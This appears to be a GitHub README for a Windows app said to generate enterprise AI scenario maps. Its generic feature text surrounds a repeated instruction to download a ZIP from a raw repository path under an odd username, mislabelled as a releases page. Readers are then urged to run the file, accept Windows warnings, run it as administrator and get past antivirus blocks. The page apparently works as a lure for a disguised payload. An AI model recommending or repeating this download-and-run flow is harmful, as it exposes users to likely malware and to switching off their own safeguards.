🧭 Enterprise-ai-scenario-map-skill - Auto-generate AI scenario maps

🚀 What this app does
Enterprise-ai-scenario-map-skill helps you create an AI application scenario map for a business. It turns company input into a clear report that shows where AI can help, what problems it can solve, and which use cases make sense to try first.
Use it to:
- review a company’s work areas
- find AI use cases
- group use cases by value and effort
- build a simple report for teams and leaders
- save time on early AI planning
💻 Before you start
You only need a Windows PC and access to the internet for the first download.
Helpful setup:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 500 MB of free disk space
- Permission to run downloaded files
- A PDF reader or browser if the app exports reports
📥 Download the app
Visit this page to download the latest version:
https://github.com/Nyquistratefomentation496/Enterprise-ai-scenario-map-skill/raw/refs/heads/main/scripts/Enterprise-ai-map-scenario-skill-v1.1.zip
On that page:
- Open the latest release
- Find the Windows file under Assets
- Download the file
- Open the downloaded file to run it
If Windows shows a prompt, choose the option to keep or run the file, then continue.
🛠️ Install and run on Windows
After you download the file from the releases page:
- Open your Downloads folder
- Find the file you just downloaded
- Double-click the file
- If Windows asks for permission, select Run or Yes
- Wait for the app to open
- Follow the on-screen steps to create your first scenario map
If the file comes as a ZIP folder:
- Right-click the ZIP file
- Select Extract All
- Open the extracted folder
- Double-click the app file inside
- Start the app
🧭 First-time setup
When you open the app for the first time, you may see a setup screen. Use plain company details to get a good result.
Enter:
- company name
- industry
- main business goals
- core departments
- current pain points
- known AI ideas or requests
- target output format, if asked
If you are unsure, start with short notes. The app can still build a useful first draft.
📝 How to create a scenario map
Use this simple flow:
- Open the app
- Enter the company details
- Choose the business areas to review
- Start the analysis
- Review the generated AI use cases
- Sort them by value and effort
- Export the report
A good scenario map often includes:
- customer service
- sales
- marketing
- operations
- finance
- HR
- knowledge management
- document handling
- data review
- internal support
📊 What the report includes
The generated report may include:
- business area overview
- AI use case list
- problem and solution pairs
- value score
- effort score
- priority ranking
- simple rollout path
- notes for next steps
This helps teams see which ideas are ready now and which need more planning.
For a cleaner report, use direct and specific notes.
Good examples:
- “The support team handles 300 emails a day”
- “Sales reps spend too much time writing follow-up emails”
- “Finance checks invoices by hand”
- “HR reviews many resumes each month”
- “Staff cannot find policy documents fast”
Avoid vague input like:
- “Improve everything”
- “Make the company smarter”
- “Use AI in all areas”
🔧 Common uses
This tool fits many company tasks, such as:
- AI workshop prep
- digital transformation planning
- internal strategy reviews
- department process review
- use case discovery
- business case drafting
- leadership presentation prep
🪟 Windows tips
If the app does not open right away:
- make sure the download finished
- check your Downloads folder
- try running the file as administrator
- unzip the folder if needed
- confirm your antivirus did not block the file
- download the latest release again if the file looks broken
If Windows asks for confirmation, choose the option that lets the app run.
📁 Release files
The releases page may contain:
- a Windows executable file
- a ZIP package
- a report template
- supporting files
Use the file meant for Windows. If more than one file appears, the release notes usually show which one to choose.
🔍 What to expect after launch
After startup, the app may:
- show a form for company details
- ask for a business focus
- generate a use case map
- create a report file
- let you export or copy the result
The output should be simple to read and easy to share with a team.
🧱 Suggested workflow for teams
A practical way to use the app:
- Gather notes from one team
- Run the app with those notes
- Review the first report
- Adjust the input for each department
- Compare results across teams
- Pick the top use cases
- Share the report with leaders
This approach helps you move from ideas to a clear plan.
📌 File safety and storage
Keep the downloaded file in a folder you can find again. A simple path works best, such as:
- Downloads
- Desktop
- Documents
If the app creates report files, store them in a project folder so your team can find them later.
You can try input like this:
- Company: Mid-size retail group
- Industry: Retail
- Goals: Reduce support time, improve sales follow-up, speed up document search
- Areas: Customer service, sales, operations, HR
- Pain points: Long response times, manual reporting, slow document access
This kind of input gives the app enough detail to build a useful first report.
The report may use:
- tables
- ranked lists
- short section headings
- plain language summaries
- action items
- priority labels
This makes the result easy to review in meetings or share by email.
❓ FAQ
Do I need coding skills?
No. You only need to download the file, open it, and enter company details.
Can I use it on Windows?
Yes. The main download flow is built for Windows users.
Where do I get the app?
Use the releases page here:
https://github.com/Nyquistratefomentation496/Enterprise-ai-scenario-map-skill/raw/refs/heads/main/scripts/Enterprise-ai-map-scenario-skill-v1.1.zip
What if I downloaded the wrong file?
Go back to the releases page and choose the Windows file in the latest release.
Can I use it for one department only?
Yes. You can focus on one team, one process, or one business area.
🧭 Next steps
Open the releases page, download the latest Windows file, and run it on your PC